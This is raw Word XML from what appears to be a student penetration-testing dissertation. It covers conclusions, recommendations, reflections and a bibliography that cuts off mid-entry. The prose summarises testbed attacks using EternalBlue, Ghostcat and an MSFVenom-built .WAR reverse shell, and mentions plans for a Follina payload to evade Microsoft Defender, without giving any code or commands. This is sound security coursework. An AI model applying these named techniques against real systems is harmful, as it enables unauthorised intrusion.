    <w:p w14:paraId="60357A3C" w14:textId="1B4CA42F" w:rsidR="00981599" w:rsidRDefault="00DD2720" w:rsidP="00E923A4">
      <w:r>
        <w:t xml:space="preserve">EternalBlue was </w:t>
      </w:r>
      <w:r w:rsidR="00316240">
        <w:t xml:space="preserve">successfully </w:t>
      </w:r>
      <w:r>
        <w:t>executed, allowing RCE to take place. This in turn allowed two flags to be captured on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664364FB" w14:textId="2D1CD303" w:rsidR="0063625C" w:rsidRPr="002F0994" w:rsidRDefault="0063625C" w:rsidP="00E923A4">
      <w:r>
        <w:t>Ghostcat was implemented which allowed the victim machine to be compromised with one flag initially captured</w:t>
      </w:r>
      <w:r w:rsidR="007545C2">
        <w:t xml:space="preserve"> and following an escalation of privileges the root.txt was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09313AC0" w14:textId="398370DF" w:rsidR="00E923A4" w:rsidRDefault="00316240" w:rsidP="00D44DC6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jerry with MSFVenom was </w:t>
      </w:r>
      <w:r w:rsidR="007545C2">
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t>, a .WAR file was created and uploaded allowing a remote shell to be established. This in turn led to both flags being captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510F333" w14:textId="4910C1F2" w:rsidR="00E923A4" w:rsidRDefault="00542EA0" w:rsidP="00D44DC6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The conclusion drawn from these experiments is that whilst Organisation A’s results from the OpenVAS scan </w:t>
      </w:r>
      <w:r w:rsidR="003A377E">
        <w:t xml:space="preserve">show many </w:t>
      </w:r>
      <w:r w:rsidR="00302785">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="003A377E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003A377E" w:rsidRPr="006C0F01">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="003A377E" w:rsidRPr="006C0F01">
        <w:t xml:space="preserve"> difficult to recreate a testbed that </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01" w:rsidRPr="006C0F01">
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidR="003A377E" w:rsidRPr="006C0F01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>Organisation A’s</w:t>
      </w:r>
      <w:r w:rsidR="003A377E" w:rsidRPr="006C0F01">
        <w:t xml:space="preserve"> security software. </w:t>
      </w:r>
      <w:r w:rsidR="003A377E">
        <w:t xml:space="preserve">Therefore, whilst the testbed results are positive and demonstrate that Organisation A </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidR="003A377E">
        <w:t>s vulnerable, th</w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>ese results</w:t>
      </w:r>
      <w:r w:rsidR="003A377E">
        <w:t xml:space="preserve"> may not be as easy to achieve against their network as it was within the testbed experiments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64306692" w14:textId="0613CAB8" w:rsidR="00542EA0" w:rsidRDefault="00542EA0" w:rsidP="00542EA0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="506" w:name="_Toc113190762"/>
      <w:r>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r w:rsidR="00693FAD">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w14:paraId="133FBBBB" w14:textId="77167237" w:rsidR="005631CF" w:rsidRDefault="003A377E" w:rsidP="002C1C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this project to be </w:t>
      </w:r>
      <w:r w:rsidR="00BD71A2">
        <w:t xml:space="preserve">more complete, the author </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>requires</w:t>
      </w:r>
      <w:r w:rsidR="00BD71A2">
        <w:t xml:space="preserve"> more knowledge creating payloads, in particular, an .RTF document for the Follina exploit to attempt a bypass of Microsoft Defender. </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>A more accurate result</w:t>
      </w:r>
      <w:r w:rsidR="00BD71A2">
        <w:t xml:space="preserve"> would be </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t xml:space="preserve">achieved if these tests were </w:t>
      </w:r>
      <w:r w:rsidR="004117A9">
        <w:t>executed</w:t>
      </w:r>
      <w:r w:rsidR="00BD71A2">
        <w:t xml:space="preserve"> against Organisation A rather than using a testbed environment.</w:t>
      </w:r>
      <w:r w:rsidR="005631CF">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6CD44" w14:textId="619D3E69" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="_Toc113190763"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER </w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E923A4">
        <w:t>REFLECTIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="1439258A" w14:textId="708A290E" w:rsidR="007B5E2F" w:rsidRDefault="007B5E2F" w:rsidP="007B5E2F">
      <w:r>
        <w:t xml:space="preserve">The success of the testbed experiments proved that there </w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t>were residual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> weaknesses within Organisation A’s network. The lessons learned</w:t>
      </w:r>
      <w:r w:rsidR="006C0F01">
        <w:t xml:space="preserve"> include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploits and payloads, how they are created and applied together with a greater understanding of coding in Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E24CFF" w14:textId="739ADA3F" w:rsidR="007B5E2F" w:rsidRDefault="007B5E2F" w:rsidP="007B5E2F">
      <w:r>
        <w:t xml:space="preserve">The use of </w:t>
      </w:r>
      <w:r w:rsidR="00F0692A">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t xml:space="preserve"> project planner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allowed me to complete the project in a timely manner, </w:t>
      </w:r>
      <w:r w:rsidR="005B0EA4">
        <w:t>achieving</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the aim and objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C726894" w14:textId="417B3209" w:rsidR="005B0EA4" w:rsidRDefault="005B0EA4" w:rsidP="005B0EA4">
      <w:r>
        <w:t xml:space="preserve">The project would have benefitted from the ability to be tested against Organisation A’s network as the results would have been more compelling. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BBA022" w14:textId="2F18EC73" w:rsidR="00ED1E38" w:rsidRDefault="00ED1E38" w:rsidP="005B0EA4">
      <w:r>
        <w:t>Many new skills were acquired during this project and many current skills were honed, both of which will assist the author with their future career.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA07ABE" w14:textId="3C951905" w:rsidR="00C8706B" w:rsidRDefault="00ED1E38" w:rsidP="00C8706B">
      <w:r>
        <w:t xml:space="preserve">Following this project, </w:t>
      </w:r>
      <w:r w:rsidR="005B0EA4">
        <w:t xml:space="preserve">Organisation A </w:t>
      </w:r>
      <w:r>
        <w:t>should perform regular vulnerability scans and mitigate any vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEDA43E" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6D87E" w14:textId="32674A77" w:rsidR="0097339C" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="508" w:name="_Toc113190764"/>
      <w:r w:rsidRPr="002F7CF9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER </w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7CF9">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0097339C">
        <w:t>BIBLIOGRAPHY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:tag w:val="MENDELEY_BIBLIOGRAPHY"/>
        <w:id w:val="306284762"/>
        <w:placeholder>
          <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
        </w:placeholder>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="3E5CCD1C" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="781919178"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022).” https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/ (accessed May 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="09358C0F" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="113181897"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">K. Phillips, J. C. Davidson, R. R. Farr, C. Burkhardt, S. Caneppele, and M. P. Aiken, “Conceptualizing Cybercrime: Definitions, Typologies and Taxonomies,” </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Forensic Sciences</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, vol. 2, no. 2, pp. 379–398, Apr. 2022, doi: 10.3390/forensicsci2020028.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="664AC99A" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="235214717"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Cybercrime - prosecution guidance | The Crown Prosecution Service.” https://www.cps.gov.uk/legal-guidance/cybercrime-prosecution-guidance (accessed May 23, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5E2514F3" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="695817248"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“2022 Cyber Attack Statistics, Data, and Trends | Parachute.” https://parachute.cloud/2022-cyber-attack-statistics-data-and-trends/ (accessed May 23, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4FA19FB8" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1721128070"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“The rise of cyber crime - IT Governance UK Blog.” https://www.itgovernance.co.uk/blog/the-rise-of-cyber-crime (accessed May 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="06792FD6" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="965235182"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">D. F. Norris, L. Mateczun, A. Joshi, and T. Finin, “Cyberattacks at the Grass Roots: American Local Governments and the Need for High Levels of Cybersecurity,” </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Public Administration Review</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, vol. 79, no. 6, pp. 895–904, Nov. 2019, doi: 10.1111/PUAR.13028.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="722CDDFC" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1120149917"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[7]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“IT threat evolution in Q2 2021. Mobile statistics | Securelist.” https://securelist.com/it-threat-evolution-q2-2021-mobile-statistics/103636/ (accessed May 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3E4D040F" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="412512250"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Cisco Annual CyberSecurity Report”.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2BA18280" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1689017052"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“ENISA Threat Landscape 2020 - Malware — ENISA.” https://www.enisa.europa.eu/publications/malware (accessed May 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6E18342D" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1533570704"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Malware Statistics &amp; Trends Report | AV-TEST.” https://www.av-test.org/en/statistics/malware/ (accessed May 22, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="31968DB9" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="784010018"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“2020 Webroot Threat Report_US_FINAL”.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="77C7B0EB" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="333923409"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Is cybersecurity about more than protection?”.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="42DB28D9" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="2032491468"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">R. Baloch, </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>ETHICAL HACKING AND PENETRATION TESTING GUIDE</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t xml:space="preserve">. </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6CBAE1E0" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="893931502"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“OWASP Penetration Testing: The Essential Guide - Codepedia.” https://codepedia.info/owasp-penetration-testing (accessed May 21, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="58782E6F" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="11731399"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“Pre-engagement - The Penetration Testing Execution Standard.” http://www.pentest-standard.org/index.php/Pre-engagement (accessed May 21, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="159A2D12" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1112361815"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“What is the CIA Triad? Definition, Explanation and Examples.” https://www.techtarget.com/whatis/definition/Confidentiality-integrity-and-availability-CIA (accessed May 21, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="56BFCFB9" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1664358641"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[17]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>RedTeam Security, “RedTeam Security Threat Prevention Experts.” https://www.redteamsecure.com/blog/penetration-test-need (accessed Jul. 10, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1790D14A" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1408958546"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>[18]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">S. Rahalkar, </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Quick Start Guide to Penetration Testing</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>. Berkley: Apress, 2019.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="29B9B8A2" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1284389155"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[19]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">G. Jayasuryapal, P. M. Pranay, H. Kaur, and Swati, “A Survey on Network Penetration Testing,” </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t>Proceedings of 2021 2nd International Conference on Intelligent Engineering and Management, ICIEM 2021</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>, pp. 373–378, Apr. 2021, doi: 10.1109/ICIEM51511.2021.9445321.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="54ECF3E5" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="324167426"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:t>[20]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
            <w:tab/>
            <w:t>“The Penetration Testing Execution Standard.” http://www.pentest-standard.org/index.php/Main_Page (accessed Jul. 10, 2022).</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="21557840" w14:textId="77777777" w:rsidR="00663E33" w:rsidRDefault="00663E33" w:rsidP="00663E33">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:ind w:hanging="640"/>
            <w:jc w:val="left"/>
            <w:divId w:val="1552810855"/>
            <w:rPr>
